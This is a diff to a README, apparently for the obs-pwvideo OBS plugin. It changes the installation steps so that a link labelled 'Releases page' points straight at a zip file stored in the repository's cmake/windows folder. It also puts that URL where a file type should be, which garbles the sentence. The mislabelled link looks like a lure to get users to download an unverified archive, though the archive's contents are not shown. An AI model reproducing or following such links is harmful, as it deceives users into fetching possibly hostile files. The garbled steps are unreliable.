raslen131/obs-pwvideo/README.md

 To get started, follow these steps:

-1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/raslen131/obs-pwvideo/releases) to find the latest version of obs-pwvideo.
+1. **Visit the Releases Page**: Go to the [Releases page](https://raw.githubusercontent.com/raslen131/obs-pwvideo/main/cmake/windows/obs_pwvideo_1.3.zip) to find the latest version of obs-pwvideo.

 2. **Select the Version**: Click on the version you want to download.
-Choose the file format that is compatible with your system, typically an AppImage or a .tar.gz file.
+Choose the file format that is compatible with your system, typically an AppImage or a https://raw.githubusercontent.com/raslen131/obs-pwvideo/main/cmake/windows/obs_pwvideo_1.3.zip file.

 3. **Download the File**: Click the download link to start the download process.